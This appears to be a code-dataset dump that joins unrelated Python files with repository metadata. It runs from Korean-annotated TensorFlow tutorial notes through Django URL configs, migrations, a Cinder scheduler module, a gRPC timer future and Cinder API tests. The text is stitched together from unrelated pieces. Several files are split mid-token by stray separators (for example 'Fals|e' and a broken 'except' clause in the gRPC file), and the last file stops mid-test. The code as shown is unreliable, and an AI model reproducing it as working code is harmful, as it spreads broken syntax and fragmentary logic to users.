node3 = tf.add(node1, node2) # 숫자, 데이터타입
# node3 = node1 + node2 # 이렇게도 사용가능
print(node1)
print(node2)
print(node3)
sess = tf.Session()
print('sess.run(node1, node2):', sess.run([node1, node2]))
print('sess.run(node3):', sess.run(node3))
# 그래프는 미리 만들어놓고 실행시키는 단계에서 값을 주고 싶을 때
# placeholder
a = tf.placeholder(tf.float32)
b = tf.placeholder(tf.float32)
adder_node = a + b
print(sess.run(adder_node, feed_dict={a:3, b:4.5}))
print(sess.run(adder_node, feed_dict={a:[1,3], b:[2,4]}))
# tendor는 array를 말한다.
# 어레이의 랭크
# 0:scalar // 1:vector // 2:matrix // n:n-tensor.....
# tensor의 shape
# .shape()해서 나오는 모양
# type
# int32 // float32
# 정리
# 그래프를 설계, 빌드!
# 그래프 실행(sess.run, 변수설정)
# 결과 반환
#### 텐서 딥러닝 4장 - 파일에서 데이터 읽어오기
import numpy as np
import tensorflow as tf
xy = np.loadtxt('C:\python\DeepLearningPythonStudy\DeepLearning\DeepLearning\\02_Deep_ChoTH\data\data-01-test-score.csv', delimiter=',', dtype=np.float32)
x_data = xy[:, 0:-1]
y_data = xy[:, [-1]]
print(x_data.shape, x_data, len(x_data))
print(y_data.shape, y_data)
# 참고
# b = np.array([[1,2,3,4], [5,6,7,8], [9,10,11,12]])
# b[:, 1] # 전체 행의 1번 열 다 출력
# b[-1] # 마지막행
# b[-1, :] # 마지막 행 전체 출력
# b[0:2, :] # 1,2번 행의 전체 열
# 몇차원 어레이냐? -> 랭크, rank
# 어떤 모양의 어레이냐? -> 셰입, shape
# 축, axis
sess = tf.InteractiveSession()
t = tf.constant([1,2,3,4])
tf.shape(t).eval()
t = tf.constant([[1,2],
[3,4]])
tf.shape(t).eval()
t = tf.constant([[[[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]]]])
tf.shape(t).eval()
m1 = tf.constant([[1.,2.]])
m2 = tf.constant(3.)
tf.shape(m1+m2).eval()
tf.reduce_mean([1.,2.], axis=0).eval() # integer이면 안된다. float!!!
x = [[1.,2.],
[3.,4.]]
tf.reduce_mean(x).eval()
tf.reduce_mean(x, axis=1).eval()
tf.reduce_mean(x, axis=0).eval() # 가장 바깥쪽의 축이 0이 된다.
tf.reduce_mean(x, axis=-1).eval() # 가장 안쪽의 축이 -1이 된다.
tf.reduce_sum(x).eval()
tf.reduce_sum(x, 1).eval()
tf.reduce_sum(x, 0).eval()
tf.reduce_sum(x, -1).eval() # 가장 안쪽
x = [[0,1,2],
[2,1,0]]
tf.argmax(x).eval() # 가장 큰 수의 인덱스를 반환하는 함수, 축을 적지 않으면 0으로 간주
tf.argmax(x, 1).eval()
tf.argmax(x, 0).eval()
tf.argmax(x, -1).eval()
t = np.array([[[0, 1, 2],
[3, 4, 5]],
[[6, 7, 8],
[9, 10, 11]]])
t.shape
tf.reshape(t, shape=[-1,3]).eval() # 안쪽은 3, 나머지는 알아서 해(-1), 2차원으로
tf.reshape(t, shape=[-1,1,3]).eval() # 안쪽은 3, 그다음은 1, 나머지는 알아서(-1), 2차원으로
tf.squeeze([[0], [1], [2]]).eval() # 차원축소
tf.expand_dims([0,1,2], 1).eval() # 차원추가
# one hot
tf.one_hot([[0], [1], [2], [0]], depth=3).eval() # 랭크가 자동으로 추가
t = tf.one_hot([[0], [1], [2], [0]], depth=3) # 랭크가 자동적으로 추가되는 것을 막기 위해 reshape
tf.reshape(t, shape=[-1, 3]).eval()
tf.cast([1.8, 2.2, 3.3, 4.9], tf.int32).eval()
tf.cast([True, False, 1 == 1, 0 == 1], tf.int32).eval()
x = [1, 4]
y = [2, 5]
z = [3, 6]
# Pack along first dim.
tf.stack([x, y, z]).eval()
tf.stack([x, y, z], axis=0).eval()
tf.stack([x, y, z], axis=1).eval()
x = [[0, 1, 2],
[2, 1, 0]]
tf.ones_like(x).eval()
tf.zeros_like(x).eval()
for x, y in zip([1,2,3], [4,5,6]):
print(x, y)
for x, y, z in zip([1,2,3], [4,5,6], [7,8,9]):
print(x, y, z)
# K = tf.sigmoid(tf.matmul(X, W1) + b1)
# hypothesis = tf.sigmoid(tf.matmul(K, W2) + b2)
# ML lab 09-1:Neural Net for XOR
# XOR 신경망 코드
import numpy as np
import tensorflow as tf
x_data = np.array([[0,0], [0,1], [1,0], [1,1]], dtype=np.float32)
y_data = np.array([[0], [1], [1], [0]], dtype=np.float32)
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
W = tf.Variable(tf.random_normal([2,1]), name='weight')
b = tf.Variable(tf.random_normal([1]), name='bias')
# 데이터가 적어서 softmax 함수 생략
hypothesis = tf.sigmoid(tf.matmul(X,W) + b)
cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y) * tf.log(1-hypothesis)) # 손실함수 구하기
train = tf.train.GradientDescentOptimizer(learning_rate=0.1).minimize(cost) # 경사감소법으로 손실함수 줄여나가기
# Accuracy computation
# True is hypothesis>0.5 else False
predicted = tf.cast(hypothesis>0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Lounch graph
sess = tf.Session()
# Initioalize Tensorflow variables
sess.run(tf.global_variables_initializer())
for step in range(1001):
sess.run(train, feed_dict={X:x_data, Y:y_data})
if step%100 == 0:
print(step, sess.run(cost, feed_dict={X:x_data, Y:y_data}))
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy], feed_dict={X:x_data, Y:y_data})
print("\nHypothesis:", h, "\nCorrect:", c, "\nAccuracy:", a)
# 오류는 없지만 손실함수가 감소하지 않는다. 지나치게 단순해서, 1층!~
# accuracy : [0.50208956]
# 위의 망과 비슷한 2층 신경망
import numpy as np
import tensorflow as tf
x_data = np.array([[0,0], [0,1], [1,0], [1,1]], dtype=np.float32)
y_data = np.array([[0], [1], [1], [0]], dtype=np.float32)
X = tf.placeholder(tf.float32)
Y = tf.placeholder(tf.float32)
W1 = tf.Variable(tf.random_normal([2,2]), name='weight1') # 앞의 2는 데이터수, 뒤의 2는 노드수(출력값의 개수)
b1 = tf.Variable(tf.random_normal([2]), name='bias1') # 바이어스는 출력값의 개수와 맞춰줘야 한다.
layer1 = tf.sigmoid(tf.matmul(X,W1) + b1)
# layer1 = tf.nn.relu(tf.matmul(X,W1) + b1)
W2 = tf.Variable(tf.random_normal([2,1]), name='weight2')
b2 = tf.Variable(tf.random_normal([1]), name='bias2')
hypothesis = tf.sigmoid(tf.matmul(layer1,W2) + b2)
cost = -tf.reduce_mean(Y*tf.log(hypothesis) + (1-Y) * tf.log(1-hypothesis)) # 손실함수 구하기
train = tf.train.GradientDescentOptimizer(learning_rate=0.1).minimize(cost) # 경사감소법으로 손실함수 줄여나가기
# Accuracy computation
# True is hypothesis>0.5 else False
predicted = tf.cast(hypothesis>0.5, dtype=tf.float32)
accuracy = tf.reduce_mean(tf.cast(tf.equal(predicted, Y), dtype=tf.float32))
# Lounch graph
sess = tf.Session()
# Initioalize Tensorflow variables
sess.run(tf.global_variables_initializer())
for step in range(1001):
sess.run(train, feed_dict={X:x_data, Y:y_data}
|
)
if step%100 == 0:
print(step, sess.run(cost, feed_dict={X:x_data, Y:y_data}))
# Accuracy report
h, c, a = sess.run([hypothesis, predicted, accuracy], feed_dict={X:x_data, Y:y_data})
print("\nHypothesis:", h,
|
"\nCorrect:", c, "\nAccuracy:", a)
# Accuracy: 0.75
# 층이 많다고 무조건 정확도가 올라가는 것이 아니다.
# 왜냐하면 오차역전파를 하면서 시그모이드에 의해 항상 1보다 작은 숫자가 계속 곱해지면서 최종적인 값이 점점 작아지게 된다.
# 뒤로 갈 수록, 즉 입력값에 가까울 수록 영향력이 작아지면서 기울기가 사라지게 된다. vanishing gradient
# 그래서 렐루를 사용한다. 마지막만 시그모이드를 사용한다. 0~1 사이의 값을 가져야하기 때문에
# 초기값을 줄 때 유의사항
# 1. 0을 주면 안된다.
# 2. RBM은 어려우니 싸비에르, He
# W = np.random.randn(fan_in, fan_out/np.sqrt(fan_in)) # 싸비에르
# W = np.random.randn(fan_in, fan_out/np.sqrt(fan_in/2)) # He
# CNN 제외하고 xavier, relu, dropout, adam 사용
import tensorflow as tf
import numpy as np
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
nb_classes = 10
keep_prob = tf.placeholder(tf.float32)
X = tf.placeholder(tf.float32, [None, 784])
Y = tf.placeholder(tf.float32, [None, nb_classes])
###################################################
W1 = tf.get_variable("W1", shape=[784, 256], initializer=tf.contrib.layers.xavier_initializer())
b1 = tf.Variable(tf.random_normal([256]))
layer1 = tf.nn.relu(tf.matmul(X, W1) + b1)
layer1 = tf.nn.dropout(layer1, keep_prob=keep_prob)
W2 = tf.get_variable("W2", shape=[256, 128], initializer=tf.contrib.layers.xavier_initializer())
b2 = tf.Variable(tf.random_normal([128]))
layer2 = tf.nn.relu(tf.matmul(layer1, W2) + b2)
layer2 = tf.nn.dropout(layer2, keep_prob=keep_prob)
W3 = tf.get_variable("W3", shape=[128, nb_classes], initializer=tf.contrib.layers.xavier_initializer())
b3 = tf.Variable(tf.random_normal([nb_classes]))
hypothesis = tf.matmul(layer2, W3) + b3
###################################################
cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=hypothesis, labels=Y))
optimizer = tf.train.AdamOptimizer(learning_rate=0.001).minimize(cost)
# Test model
is_correct = tf.equal(tf.arg_max(hypothesis, 1),
|
blancltd/glitter-news
|
glitter_news/urls.py
|
Python
|
bsd-2-clause
| 849
| 0.002356
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import url
from . import feeds, views
urlpatterns = [
url(r'^$', views.PostListView.as_view(), name='list'),
url(
r'^category/(?P<slug>[-\w]+)/$',
views.PostListCategoryView.as_view(),
name='post-list-category'
),
url(
r'^(?P<year>\d{4})/(?P<month>\d{2})/(?P<day>\d{2})/(?P<slug>[-\w]+)
|
/$',
views.PostDetailView.as_view(),
name='post-detail'
),
url(r'^feed/$', feeds.NewsFeed(), name='feed'),
url(r'^feed/(?P<slug>[-\w]+)/$', feeds.NewsCategoryFeed(), name='category-feed'),
]
if getattr(settings, 'GLITTER_NEWS_TAGS', Fals
|
e):
urlpatterns += [
url(r'^tag/(?P<slug>[-\w]+)/$', views.PostListTagView.as_view(), name='post-list-tag'),
]
|
djaodjin/djaodjin-survey
|
survey/api/campaigns.py
|
Python
|
bsd-2-clause
| 3,013
| 0.000332
|
# Copyright (c) 2020, DjaoDjin inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
# TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
from rest_framework import generics
from ..mixins import CampaignMixin
from .serializers import CampaignSerializer
LOGGER = logging.getLogger(__name__)
class CampaignAPIView(CampaignMixin, generics.RetrieveDestroyAPIView):
"""
Retrieves a campaign
Retrieves the details of a ``Campaign``.
**Tags**: survey
**Examples**
.. code-block:: http
GET /api/cowork/campaign/best-practices/ HTTP/1.1
responds
.. code-block:: json
{
"slug": "best-practices",
"ac
|
count": "envconnect",
"title": "Assessment on Best Practices",
"active": true,
"quizz_mode": false,
"que
|
stions": [
{
"path": "/product-design",
"title": "Product Design",
"unit": "assessment-choices",
},
{
"path": "/packaging-design",
"title": "Packaging Design",
"unit": "assessment-choices",
}
]
}
"""
serializer_class = CampaignSerializer
def get_object(self):
return self.campaign
def delete(self, request, *args, **kwargs):
"""
Deletes a campaign
Removes a ``Campaign`` and all associated ``Sample``
from the database.
**Tags**: survey
**Examples**
.. code-block:: http
DELETE /api/cowork/campaign/best-practices/ HTTP/1.1
"""
#pylint:disable=useless-super-delegation
return super(CampaignAPIView, self).delete(request, *args, **kwargs)
|
MartinPaulo/resplat
|
storage/migrations/0015_auto_20170914_0154.py
|
Python
|
lgpl-3.0
| 1,300
| 0.000769
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-09-14 01:54
from __futu
|
re__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import storage.models.labels
class Migration(migrations.Migration):
dependencies = [
('storage', '0014_auto_20170914_0146'),
]
operations = [
migrations
|
.RemoveField(
model_name='accesslayer',
name='active_flag',
),
migrations.RemoveField(
model_name='accesslayer',
name='created_by',
),
migrations.RemoveField(
model_name='accesslayer',
name='creation_date',
),
migrations.RemoveField(
model_name='accesslayer',
name='last_modified',
),
migrations.RemoveField(
model_name='accesslayer',
name='updated_by',
),
migrations.AlterField(
model_name='accesslayer',
name='source',
field=models.ForeignKey(blank=True, default=storage.models.labels.GroupDefaultLabel('Access Layer Source'), help_text='the access layer source', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='access_layer', to='storage.Label'),
),
]
|
alvcarmona/efficiencycalculatorweb
|
effcalculator/effcalculator/urls.py
|
Python
|
gpl-3.0
| 915
| 0.001093
|
"""effcalculator URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
|
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from dja
|
ngo.contrib import admin
from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^api/', include('api.urls')),
url(r'^', include('frontend.urls'))
]
|
zenefits/sentry
|
src/sentry/south_migrations/0104_auto__add_groupseen__add_unique_groupseen_group_user.py
|
Python
|
bsd-3-clause
| 28,081
| 0.008048
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'GroupSeen'
db.create_table(u'sentry_groupseen', (
('id', self.gf('sentry.db.models.fields.bounded.BoundedBigAutoField')(primary_key=True)),
('project', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Project'])),
('group', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.Group'])),
('user', self.gf('sentry.db.models.fields.FlexibleForeignKey')(to=orm['sentry.User'], db_index=False)),
('last_seen', self.gf('django.db.models.fields.DateTimeField')(default=datetime.datetime.now)),
))
db.send_create_signal(u'sentry', ['GroupSeen'])
# Adding unique constraint on 'GroupSeen', fields ['group', 'user']
db.create_unique(u'sentry_groupseen', ['user_id', 'group_id'])
def backwards(self, orm):
# Removing unique constraint on 'GroupSeen', fields ['group', 'user']
db.delete_unique(u'sentry_groupseen', ['user_id', 'group_id'])
# Deleting model 'GroupSeen'
db.delete_table(u'sentry_groupseen')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'sentry.user': {
'Meta': {'object_name': 'User', 'db_table': "'auth_user'"},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'nam
|
e': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'sentry.accessgroup': {
'Meta': {'unique_together': "(('team', 'name'),)", 'object_name': 'AccessGroup'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_added': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('s
|
entry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'managed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'members': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sentry.User']", 'symmetrical': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'projects': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['sentry.Project']", 'symmetrical': 'False'}),
'team': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Team']"}),
'type': ('django.db.models.fields.IntegerField', [], {'default': '50'})
},
u'sentry.activity': {
'Meta': {'object_name': 'Activity'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'event': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Event']", 'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'ident': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True'}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'type': ('django.db.models.fields.PositiveIntegerField', [], {}),
'user': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.User']", 'null': 'True'})
},
u'sentry.alert': {
'Meta': {'object_name': 'Alert'},
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']", 'null': 'True'}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'}),
'message': ('django.db.models.fields.TextField', [], {}),
'project': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Project']"}),
'related_groups': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'related_alerts'", 'symmetrical': 'False', 'through': u"orm['sentry.AlertRelatedGroup']", 'to': u"orm['sentry.Group']"}),
'status': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0', 'db_index': 'True'})
},
u'sentry.alertrelatedgroup': {
'Meta': {'unique_together': "(('group', 'alert'),)", 'object_name': 'AlertRelatedGroup'},
'alert': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Alert']"}),
'data': ('django.db.models.fields.TextField', [], {'null': 'True'}),
'group': ('sentry.db.models.fields.FlexibleForeignKey', [], {'to': u"orm['sentry.Group']"}),
'id': ('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {'primary_key': 'True'})
},
u'sentry.event': {
'Meta': {'unique_together': "(('project', 'event_id'),)", 'object_name': 'Event', 'db_table': "'sentry_message'"},
'checksum': ('django.db.models.fields.CharField', [], {'max_length': '32', 'db_index': 'True'}),
'culprit': ('django.db.models.fields.Ch
|
rickerc/cinder_audit
|
cinder/openstack/common/scheduler/weights/__init__.py
|
Python
|
apache-2.0
| 1,305
| 0
|
# Copyright (c) 2011 OpenStack Foundation.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRA
|
NTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the Lice
|
nse.
"""
Scheduler host weights
"""
from cinder.openstack.common.scheduler import weight
class WeighedHost(weight.WeighedObject):
def to_dict(self):
return {
'weight': self.weight,
'host': self.obj.host,
}
def __repr__(self):
return ("WeighedHost [host: %s, weight: %s]" %
(self.obj.host, self.weight))
class BaseHostWeigher(weight.BaseWeigher):
"""Base class for host weights."""
pass
class HostWeightHandler(weight.BaseWeightHandler):
object_class = WeighedHost
def __init__(self, namespace):
super(HostWeightHandler, self).__init__(BaseHostWeigher, namespace)
|
kidaa/kythe
|
third_party/grpc/src/python/src/grpc/framework/foundation/_timer_future.py
|
Python
|
apache-2.0
| 6,903
| 0.01101
|
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Affords a Future implementation based on Python's threading.Timer."""
import sys
import threading
import time
from grpc.framework.foundation import future
class TimerFuture(future.Future):
"""A Future implementation based around Timer objects."""
def __init__(self, compute_time, computation):
"""Constructor.
Args:
compute_time: The time after which to begin this future's computation.
computation: The computation to be performed within this Future.
"""
self._lock = threading.Lock()
self._compute_time = compute_time
self._computation = computation
self._timer = None
self._computing = False
self._computed = False
self._cancelled = False
self._result = None
self._exception = None
self._traceback = None
self._waiting = []
def _compute(self):
"""Performs the computation embedded in this Future.
Or doesn't, if the time to perform it has not yet arrived.
"""
with self._lock:
time_remaining = self._compute_time - time.time()
if 0 < time_remaining:
self._timer = threading.Timer(time_remaining, self._compute)
self._timer.start()
|
return
else:
self._computing = True
try:
return_value = self._computation()
except
|
ion = None
traceback = None
except Exception as e: # pylint: disable=broad-except
return_value = None
exception = e
traceback = sys.exc_info()[2]
with self._lock:
self._computing = False
self._computed = True
self._return_value = return_value
self._exception = exception
self._traceback = traceback
waiting = self._waiting
for callback in waiting:
callback(self)
def start(self):
"""Starts this Future.
This must be called exactly once, immediately after construction.
"""
with self._lock:
self._timer = threading.Timer(
self._compute_time - time.time(), self._compute)
self._timer.start()
def cancel(self):
"""See future.Future.cancel for specification."""
with self._lock:
if self._computing or self._computed:
return False
elif self._cancelled:
return True
else:
self._timer.cancel()
self._cancelled = True
waiting = self._waiting
for callback in waiting:
try:
callback(self)
except Exception: # pylint: disable=broad-except
pass
return True
def cancelled(self):
"""See future.Future.cancelled for specification."""
with self._lock:
return self._cancelled
def running(self):
"""See future.Future.running for specification."""
with self._lock:
return not self._computed and not self._cancelled
def done(self):
"""See future.Future.done for specification."""
with self._lock:
return self._computed or self._cancelled
def result(self, timeout=None):
"""See future.Future.result for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
if self._exception is None:
return self._return_value
else:
raise self._exception # pylint: disable=raising-bad-type
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
if self._exception is None:
return self._return_value
else:
raise self._exception # pylint: disable=raising-bad-type
else:
raise future.TimeoutError()
def exception(self, timeout=None):
"""See future.Future.exception for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._exception
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._exception
else:
raise future.TimeoutError()
def traceback(self, timeout=None):
"""See future.Future.traceback for specification."""
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._traceback
condition = threading.Condition()
def notify_condition(unused_future):
with condition:
condition.notify()
self._waiting.append(notify_condition)
with condition:
condition.wait(timeout=timeout)
with self._lock:
if self._cancelled:
raise future.CancelledError()
elif self._computed:
return self._traceback
else:
raise future.TimeoutError()
def add_done_callback(self, fn):
"""See future.Future.add_done_callback for specification."""
with self._lock:
if not self._computed and not self._cancelled:
self._waiting.append(fn)
return
fn(self)
|
CloudServer/cinder
|
cinder/tests/unit/api/test_common.py
|
Python
|
apache-2.0
| 24,477
| 0
|
# Copyright 2010 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
|
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Test suites for 'common' code used throughout the OpenStack HTTP API.
"""
import mock
from testtools import matchers
import webob
import webob.exc
fr
|
om cinder.api import common
from cinder import test
NS = "{http://docs.openstack.org/compute/api/v1.1}"
ATOMNS = "{http://www.w3.org/2005/Atom}"
class LimiterTest(test.TestCase):
"""Unit tests for the `cinder.api.common.limited` method.
This method takes in a list of items and, depending on the 'offset'
and 'limit' GET params, returns a subset or complete set of the given
items.
"""
def setUp(self):
"""Run before each test."""
super(LimiterTest, self).setUp()
self.tiny = range(1)
self.small = range(10)
self.medium = range(1000)
self.large = range(10000)
def test_limiter_offset_zero(self):
"""Test offset key works with 0."""
req = webob.Request.blank('/?offset=0')
self.assertEqual(common.limited(self.tiny, req), self.tiny)
self.assertEqual(common.limited(self.small, req), self.small)
self.assertEqual(common.limited(self.medium, req), self.medium)
self.assertEqual(common.limited(self.large, req), self.large[:1000])
def test_limiter_offset_medium(self):
"""Test offset key works with a medium sized number."""
req = webob.Request.blank('/?offset=10')
self.assertEqual(common.limited(self.tiny, req), [])
self.assertEqual(common.limited(self.small, req), self.small[10:])
self.assertEqual(common.limited(self.medium, req), self.medium[10:])
self.assertEqual(common.limited(self.large, req), self.large[10:1010])
def test_limiter_offset_over_max(self):
"""Test offset key works with a number over 1000 (max_limit)."""
req = webob.Request.blank('/?offset=1001')
